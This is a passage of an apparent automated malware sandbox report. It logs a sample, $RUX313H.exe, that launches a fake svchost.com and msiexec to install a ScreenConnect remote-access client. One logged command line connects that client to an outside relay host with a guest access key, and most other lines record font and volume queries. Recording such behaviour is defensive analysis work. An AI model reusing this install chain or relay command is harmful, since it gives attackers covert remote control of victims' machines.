                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF2959 SetUnhandledExceptionFilter,1_2_00DF2959
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeCode function: 1_2_00DF297C SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00DF297C
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003F3D97 SetUnhandledExceptionFilter,9_2_003F3D97
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeCode function: 9_2_003F3DC8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_003F3DC8
                          Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe 'C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exe' '?e=Access&y=Guest&h=instance-qchhoo-relay.screenconnect.com&p=443&s=da6b3e03-98fc-419f-a376-8535999f3893&k=BgIAAACkAABSU0ExAAgAAAEAAQCXhSdnV8AclTo6Qg2d%2fUagHnAuTk77VdidkN%2fHwklWj60Ukj2cjyUWF%2fyj6%2bi86j%2f4iIiD4EcKkvFNApE%2f%2fmy7V5iz8I7WLvfaBXsciWcr9yEcfZSl4AvW0iWJ2LVg8s%2bvTxK6lFGCfPmCOGop3GjLhAffGO2uiyhzZdY3cdBnrxVR1d2KV8lAELZ5VBoUfKrKrkChwusd1M6gHfzfqZEpzKJahX9yu4v97YxVChPN3WG0TWWhcEs0ZJpQzPn3g2NaZ6xL5%2bVj8rp0nPDBPjXcy%2fWFzRXbyKOD%2fA0vieIxBiRLOIqNVTkIntBIZAUsEi%2bi0gvAM%2f6xLcwwLQe0K7rN'
                          Source: C:\Users\user\Desktop\$RUX313H.exeProcess created: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe 'C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exe' Jump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\3582-490\$RUX313H.exeProcess created: C:\Windows\svchost.com 'C:\Windows\svchost.com' 'C:\Windows\System32\msiexec.exe' /i 'C:\Users\user\AppData\Local\Temp\setup.msi'Jump to behavior
                          Source: $RUX313H.exe, 00000000.00000002.1199004606.0000000000CB0000.00000002.00020000.sdmpBinary or memory string: Program Manager
                          Source: $RUX313H.exe, 00000000.00000002.1199004606.0000000000CB0000.00000002.00020000.sdmp, ScreenConnect.WindowsClient.exeBinary or memory string: Shell_TrayWnd
                          Source: $RUX313H.exe, 00000000.00000002.1199004606.0000000000CB0000.00000002.00020000.sdmp, ScreenConnect.WindowsClient.exeBinary or memory string: Progman
                          Source: $RUX313H.exe, 00000000.00000002.1199004606.0000000000CB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: GetLocaleInfoA,0_2_0040D74C
                          Source: C:\Users\user\Desktop\$RUX313H.exeCode function: GetLocaleInfoA,0_2_00403CB4
                          Source: C:\Windows\svchost.comCode function: GetLocaleInfoA,2_2_0040D74C
                          Source: C:\Windows\svchost.comCode function: GetLocaleInfoA,2_2_00403CB4
                          Source: C:\Windows\SysWOW64\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\Microsoft.Deployment.WindowsInstaller.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.InstallerActions.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\MSIFE41.tmp-\ScreenConnect.Core.dll VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Client.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Core.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Windows.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Client.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Core.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.Windows.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\comic.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\comici.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\consola.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\constan.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\constani.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\cour.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\couri.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\framd.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\impact.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\taile.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\pala.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\palai.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\palab.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\sylfaen.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\symbol.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\trebucit.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\trebucbd.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf | VolumeInformation
Source: C:\Program Files (x86)\ScreenConnect Client (77af187dd37f08fd)\ScreenConnect.WindowsClient.exe | Queries volume information: C:\Windows\Fonts\verdanai.ttf | VolumeInformation
